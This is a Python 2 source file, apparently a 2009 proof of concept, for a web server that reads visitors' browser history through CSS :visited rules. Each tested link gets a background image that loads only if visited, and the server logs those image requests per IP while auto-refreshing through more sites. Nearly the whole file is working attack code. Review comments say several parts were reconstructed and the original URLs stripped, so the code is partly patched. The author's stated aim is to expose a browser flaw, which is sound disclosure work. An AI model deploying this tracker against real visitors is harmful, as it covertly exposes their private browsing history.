# babsniff_history_css — (repository scrape header; original page said "Full commit")
#!/usr/bin/env python
# encoding: utf-8

"""Simple history sniffer - Sniff the browser history using only CSS and an unsafe CSS optimization.

This simple webserver sniffs and outputs the history using only css.
Every browser which renders background images for span tags inside a link should be affected.

It currently only checks for some selected websites, since I don't really want to create a full fledged history ripper.
Konqueror seems to be immune: It also (pre-)loads the "visited"-images from not visited links. 

Please don't let your browser load anything depending on the :visited state of a link tag!
That publicizes private information! In short: Don't keep repeating Ennesbys Mistake: 

- Mistake: 
- Effects: 


    - python
      start the server at port 8000. You can now point your browser to to get sniffed :)

To change the sites which are being checked, simply edit the "website_seed" list. 


__copyright__ = """ 
  history_sniffer - Sniff the browser history using only CSS and an unsafe CSS optimization.
© 2009 Copyright by Arne Babenhauserheide

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 3 of the License, or
  (at your option) any later version.

  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with this program; if not, write to the Free Software
  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston,
  MA 02110-1301 USA


#: A list of initial websites to check against the browser history.
#  NOTE(review): the original URLs were stripped from this file — these are
#  placeholder examples; restore the intended sites. "blubber.blau" is a
#  deliberately-nonexistent control entry.
website_seed = ["http://www.google.com", "http://en.wikipedia.org",
                "http://slashdot.org", "blubber.blau"]

# The basic HTTP Server from Python (Python 2 standard library).
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

# hashing to get class names from urls
from hashlib import md5

# And help output
from sys import argv
if "--help" in argv:
    # Print the module docstring as usage info and quit before starting the server.
    print(__doc__)
    raise SystemExit

#: The port to use
PORT = 8000

#: A dict of crawled/crawling people: {IP: {"new": [urls...], "found": [site1, site2, ...]}}
hosts = {}

#: The number of links to test per reload
LINKS_PER_REFRESH = 10

#: Time between refreshes in seconds = time between tests
REFRESH_TIME = 1

# Read in an image ("rb": PNG data is binary); close the handle once read.
f = open("1w6-favicon-32.png", "rb")
#: Link background image data, served for every /img/ request.
BG_IMAGE_DATA = f.read()
f.close()

# Spoofed style id prefix; maps a requested image back to the tested link's id.
SPOOFED_ID_PREFIX = "spoofed_"
def single_link(site):
    """Build the html snippet for one link to test.

    The wrapping span carries a unique id (md5 of the url, prefixed),
    so the spoofed style sheet can target exactly this link's
    :visited state.
    """
    site_hash = str(md5(site).hexdigest())
    return ('<span id="' + SPOOFED_ID_PREFIX + site_hash + '">'
            + '<a href="' + site + '">'
            + '<span> - ' + site + '</span>'
            + '</a></span>')

def create_style(links):
    """Create the spoofing style tag for the site.

    For every link a rule is emitted that loads a per-site background
    image only when the link is :visited — the image request reveals
    the visit to the server.
    """
    rules = []
    for site in links:
        image_url = "/img/" + str(site) + ".png"
        selector = "#" + SPOOFED_ID_PREFIX + str(md5(site).hexdigest()) + " a:visited"
        rules.append(selector + " {color: red; background-image: url(" + image_url + ");}\n")
    return "<style><!--" + "".join(rules) + "--></style>"

def spoof_html(IP):
    """Return the sniffing html page for a given IP.

    Takes the next batch of untested urls for this IP, embeds them as
    links together with a spoofed :visited style sheet, and lists the
    sites already found in the history.
    """
    # first the basic html
    html = '<html><head>'
    # If we have sites to check, add a refresh so the next batch gets
    # tested automatically.
    if hosts[IP]["new"]:
        html += '<meta http-equiv="refresh" content="' + str(REFRESH_TIME) + '; URL=/">'

    # Then get the links to test this time, remove them from the IPs list of links to test
    links = hosts[IP]["new"][:LINKS_PER_REFRESH]
    hosts[IP]["new"] = hosts[IP]["new"][LINKS_PER_REFRESH:]
    # Now add a spoofed style sheet
    html += create_style(links)

    html += '</head><body>'
    # Fix: the original added both headers when no links were left;
    # "Finished" belongs to the empty case, "Checking sites" to the rest.
    if not links:
        html += "<h1>Finished</h1>"
    else:
        html += "<h1>Checking sites</h1>"
    # Add the links to the html
    html += "\n".join([single_link(link) for link in links])

    # Also add the list of already found sites
    html += "<h1>Found sites in YOUR history</h1>"
    html += "<br />".join(hosts[IP]["found"])

    # Debug output of the whole state (parenthesized: valid in py2 and py3).
    print(hosts)
    # finish the html
    html += "</body></html>"
    return html
def process_Ip(IP):
    """Check if an IP is already known and has new sites.

    If it isn't known, create an entry for it. Return False if it has
    no more sites to check, else True.
    """
    if not IP in hosts:
        # Prepare and add the IP entry.
        # We check first for the initial websites.
        # Fix: copy the seed list — assigning it directly would share one
        # mutable list between all IPs, and spoof_html consumes it.
        new = website_seed[:]
        found = []
        hosts[IP] = {"new": new, "found": found}
        print(hosts)
    # Fix: the original had "return True" unreachable after "return False";
    # False means "nothing left to test" and True means "keep testing".
    if not hosts[IP]["new"]:
        return False
    return True

def process_image_request(IP, img_name):
    """Record a spoofed-image hit and return the image data.

    A request for /img/<site>.png means the browser rendered the
    :visited style for <site>, i.e. the site is in the history: add it
    to the IP's found pages.
    """
    # sanity check - people might anonymize their IP
    if not IP in hosts:
        print("unkown IP: " + IP)
        return ""
    site = img_name[:-4]  # strip the ".png" suffix
    # NOTE(review): the original branch bodies were lost; reconstructed as
    # "record first hit, complain about duplicates" — confirm intent.
    if not site in hosts[IP]["found"]:
        hosts[IP]["found"].append(site)
    else:
        print("Error: requested image for already checked site." + site)

    # Always return the image data if the IP is known.
    return BG_IMAGE_DATA

# A basic HTTPHandler.
class HTTPHtmlHandler(BaseHTTPRequestHandler):
    """Simple handler for GET requests, using the before defined functions.

    Serves the spoofed image for /img/<site>.png paths and the sniffing
    html page for everything else.
    """

    def do_GET(self):
        # first get the IP of the client being sniffed
        IP = self.client_address[0]

        # Now prepare the IP, if we don't yet know it
        process_Ip(IP)

        # NOTE(review): the original was missing the status line, the
        # end_headers() calls and the html branch — reconstructed here.
        self.send_response(200)
        # do image or default requests.
        if self.path.startswith("/img/"):
            # Idea: return an image, so people see how they get sniffed.
            self.send_header("Content-Type", "image/png")
            self.end_headers()
            self.wfile.write(process_image_request(IP, self.path[5:]))
        else:
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(spoof_html(IP))
def main():
    """Start the sniffing webserver on PORT and serve until ^C."""
    try:
        server = HTTPServer(('', PORT), HTTPHtmlHandler)
        print('started httpserver...')
        # NOTE(review): the URL was stripped from the original message.
        print('point your browser to http://localhost:8000 to get sniffed')
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down server')
        server.socket.close()

if __name__ == "__main__":
    main()